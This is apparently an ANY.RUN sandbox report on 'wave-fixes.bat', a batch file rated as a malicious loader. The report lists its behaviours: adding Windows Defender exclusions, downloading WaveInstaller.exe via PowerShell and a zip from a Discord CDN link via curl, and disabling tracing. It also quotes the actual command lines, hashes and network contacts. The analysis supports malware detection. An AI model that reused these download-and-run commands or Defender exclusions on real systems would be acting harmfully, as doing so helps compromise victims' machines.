File name:

wave-fixes.bat

Full analysis: https://app.any.run/tasks/3a0f2c03-c28d-4361-8e33-411aad971903
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: May 30, 2025, 02:56:59
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
discord
payload
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with CRLF line terminators
MD5:

CD6874847B186973474AE32AA1F9D2F0

SHA1:

C0DE8A0753737B107027FFF2E53EEB51BCA52577

SHA256:

6A09D3DC13A6D819F4196AB7C197633AEDD970DF832BACC33DE33A3DDA894457

SSDEEP:

48:NK6S+DdkMRRtbqwgtctzns6ZI5RjjfsLSdfVZIJKKSQiF6oFERC:e+DHRrpga+6+PkyZI4KXiF6ZRC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes Windows Defender settings

      • cmd.exe (PID: 7660)
      • powershell.exe (PID: 7724)

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 7660)
      • powershell.exe (PID: 7724)

  • SUSPICIOUS

    • Application launched itself

      • powershell.exe (PID: 7724)
      • cmd.exe (PID: 7660)

    • Starts process via Powershell

      • powershell.exe (PID: 7724)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 7660)
      • powershell.exe (PID: 7724)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 7724)
      • cmd.exe (PID: 7660)

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 7976)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 7976)

    • Discord domain found in command line (probably downloading payload)

      • curl.exe (PID: 7308)

    • The executable file from the user directory is run by the CMD process

      • WaveInstaller.exe (PID: 7268)
      • WaveInstaller.exe (PID: 4228)
      • WaveInstaller.exe (PID: 2384)

    • Reads security settings of Internet Explorer

      • WaveInstaller.exe (PID: 7268)

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 7280)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 7660)

    • Executing commands from a ".bat" file

      • cmd.exe (PID: 7660)

  • INFO

    • Checks proxy server information

      • powershell.exe (PID: 7976)
      • WaveInstaller.exe (PID: 7268)
      • slui.exe (PID: 8100)

    • Disables trace logs

      • powershell.exe (PID: 7976)
      • WaveInstaller.exe (PID: 7268)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7924)
      • powershell.exe (PID: 7280)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7924)
      • powershell.exe (PID: 7280)

    • Checks supported languages

      • curl.exe (PID: 7308)
      • WaveInstaller.exe (PID: 7268)
      • curl.exe (PID: 7324)

    • Reads the computer name

      • curl.exe (PID: 7308)
      • WaveInstaller.exe (PID: 7268)
      • curl.exe (PID: 7324)

    • Reads the machine GUID from the registry

      • WaveInstaller.exe (PID: 7268)

    • Execution of CURL command

      • cmd.exe (PID: 7660)

    • Reads the software policy settings

      • WaveInstaller.exe (PID: 7268)
      • slui.exe (PID: 8100)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
140
Monitored processes
15
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs powershell.exe waveinstaller.exe no specs waveinstaller.exe no specs waveinstaller.exe curl.exe powershell.exe no specs cmd.exe no specs conhost.exe no specs curl.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
2148cmd /c "cd VisualC++ && call install_all.bat"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
2384"C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe" C:\Users\admin\AppData\Local\Temp\WaveInstaller.execmd.exe
User:
admin
Integrity Level:
MEDIUM
Description:
WaveInstaller
Exit code:
3221226540
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\waveinstaller.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
4228"C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe" C:\Users\admin\AppData\Local\Temp\WaveInstaller.execmd.exe
User:
admin
Integrity Level:
MEDIUM
Description:
WaveInstaller
Exit code:
3221226540
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\waveinstaller.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
5248\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7268"C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe" C:\Users\admin\AppData\Local\Temp\WaveInstaller.exe
cmd.exe
User:
admin
Integrity Level:
HIGH
Description:
WaveInstaller
Exit code:
1
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\waveinstaller.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
7280powershell Expand-Archive -Path Visual-C-Runtimes-All-in-One-May-2024.zip -DestinationPath VisualC++C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
7308curl -o Visual-C-Runtimes-All-in-One-May-2024.zip "https://cdn.discordapp.com/attachments/801960895658983429/1262309228140433408/Visual-C-Runtimes-All-in-One-May-2024.zip?ex=66962094&is=6694cf14&hm=2fd48ea988a8d1cf9d388adcc897b8f3ccd74481aabb52d72d52476fdc9adeec&"C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
7324curl -o node-v20.15.0-x64.msi "https://nodejs.org/dist/v20.15.0/node-v20.15.0-x64.msi"C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
7660C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\wave-fixes.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
7668\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
28 219
Read events
28 205
Write events
14
Delete events
0

Modification events

(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7268) WaveInstaller.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\WaveInstaller_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
1
Suspicious files
4
Text files
8
Unknown types
0

Dropped files

PID
Process
Filename
Type
7924powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_h534h2pe.bk0.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7924powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xl5nl5dr.nyd.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7724powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ntza0ugf.gte.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7724powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_f2kfdk03.oru.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7976powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jdf23drl.y0g.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7280powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fnacwggh.n03.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7976powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sdzbxcal.ms2.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7924powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FAY4UMTOIB7HFZ5PJICI.tempbinary
MD5:A62D4FBABC5359D703403E8551C03F15
SHA256:772CD56B7BF9928F14771985CC9E0272C0C0792354A6E78CD14C6E5C346BD673
7976powershell.exeC:\Users\admin\AppData\Local\Temp\WaveInstaller.exeexecutable
MD5:215D509BC217F7878270C161763B471E
SHA256:984DFC64C10F96C5350D6D9216A5D7ABFECE1658DFC93925F7A6B0C80817C886
7924powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:A62D4FBABC5359D703403E8551C03F15
SHA256:772CD56B7BF9928F14771985CC9E0272C0C0792354A6E78CD14C6E5C346BD673
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
23
TCP/UDP connections
48
DNS requests
19
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
302
172.183.192.203:443
https://www.nuget.org/api/v2/package/chromiumembeddedframework.runtime.win-x86/124.3.8
unknown
html
232 b
whitelisted
GET
200
4.175.87.197:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
compressed
23.9 Kb
whitelisted
GET
2.16.183.203:443
https://globalcdn.nuget.org/packages/chromiumembeddedframework.runtime.win-x86.124.3.8.nupkg?packageVersion=124.3.8
unknown
7684
SIHClient.exe
GET
200
2.16.164.24:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
7684
SIHClient.exe
GET
200
2.16.164.24:80
http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl
unknown
whitelisted
POST
500
40.91.76.224:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
7684
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
GET
200
20.242.39.171:443
https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping
unknown
7684
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl
unknown
whitelisted
7684
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.2.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
7976
powershell.exe
104.26.5.10:443
cdn.getwave.gg
CLOUDFLARENET
US
unknown
7308
curl.exe
162.159.130.233:443
cdn.discordapp.com
CLOUDFLARENET
whitelisted
7324
curl.exe
104.20.23.46:443
nodejs.org
CLOUDFLARENET
shared
7684
SIHClient.exe
4.175.87.197:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7268
WaveInstaller.exe
172.183.192.203:443
www.nuget.org
MICROSOFT-CORP-MSN-AS-BLOCK
DE
whitelisted
7268
WaveInstaller.exe
2.19.126.162:443
globalcdn.nuget.org
Akamai International B.V.
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
google.com
  • 142.250.185.142
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
cdn.getwave.gg
  • 104.26.5.10
  • 172.67.73.39
  • 104.26.4.10
unknown
cdn.discordapp.com
  • 162.159.130.233
  • 162.159.133.233
  • 162.159.134.233
  • 162.159.135.233
  • 162.159.129.233
whitelisted
nodejs.org
  • 104.20.23.46
  • 104.20.22.46
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
www.nuget.org
  • 172.183.192.203
whitelisted
globalcdn.nuget.org
  • 2.19.126.162
  • 2.19.126.132
whitelisted
crl.microsoft.com
  • 2.16.164.24
  • 2.16.164.106
  • 2.16.164.9
  • 2.16.164.18
  • 2.16.164.99
whitelisted

Threats

PID
Process
Class
Message
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Misc activity
ET INFO Request for EXE via Powershell
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
2196
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discordapp .com)
7308
curl.exe
Misc activity
ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
wave-fixes.bat